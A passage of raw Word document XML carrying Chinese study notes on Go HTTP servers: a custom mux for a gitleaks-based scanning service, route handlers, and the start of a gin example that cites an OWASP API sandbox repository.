        <w:t>http.ListenAndServe(":"+port, mux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45066C53" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227687A4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="383E701A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>新建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> mux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>结构体，用于进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> http.ListenAndServe() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>作为第二个参数传入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5F60E6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>type GitLeaksHttpStruct struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C152E06" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13936730" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18EA4919" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于实现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> mux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ServeHTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成员方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F030172" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func (mux *GitLeaksHttpStruct) ServeHTTP(w http.ResponseWriter, r *http.Request) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615B698C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AED18DF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接收到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接，来自</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> " + r.RemoteAddr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DFE3E6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C36D3EE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在此处进行手动路由处理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6D4873" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>switch r.URL.Path {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01812857" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>case "/static_zip_scanAction":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F54CCC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>static_zip_scanAction(w, r)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27901AFC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E67F190" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>case "/get_descriptions_0":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AB0E1C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>get_descriptions_0(w, r)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4149181F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2F2FD6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>case "/get_descriptions_1":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294ADEAA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>get_descriptions_1(w, r)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384CE2E5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A93B70" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>default:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5A2623" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>RootAction(w, r)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1075B64E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDF7A8C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6D06C8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A9E9CB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C7AE0FF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: / , </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仅响应一串文字</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51165EB8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func RootAction(w http.ResponseWriter, r *http.Request) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623C88A4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>body, _ := ioutil.ReadAll(r.Body)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4752E693" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>ret := r.URL.String() + "\n" + string(body)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52647DED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>w.Write([]byte(ret))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743FD5D8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFBBD1F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07933FA2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: /git_scan </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，接收</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> post</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文本传参</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> git clone</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>凭证，用来进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gitclone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FCD682" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func get_descriptions_1(w http.ResponseWriter, r *http.Request) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBE1CF5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>注意，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>resJson</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>是获得了后面函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>数据，即</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>[]byte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4469B3C7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>resJson, err := config.RuleJson("gitleaks-all-kill")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2622ABCA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B253DB3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>log.Fatal(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBCC348" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9C9765" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>fmt.Fprintf(w, string(resJson))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5468C971" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5304E664" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E076B35" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="329" w:name="_Toc159779786"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gin</w:t>
      </w:r>
      <w:bookmarkEnd w:id="329"/>
    </w:p>
    <w:p w14:paraId="7DA8CB22" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://github.com/API-Security/APISandbox/tree/main/OWASPApiTop10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F85D35B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C0A3B93" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9C575D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BD03FE8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F309F2A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"github.com/gin-gonic/gin"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07570014" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAAAF72" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42197A63" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// infoResponse </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义返回用户信息结构体。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6678F6DD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>type infoResponse struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A36064" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>ID       int    `json:"id"`       //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，唯一，自增</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB5A995" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>Token    string `json:"token"`    //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
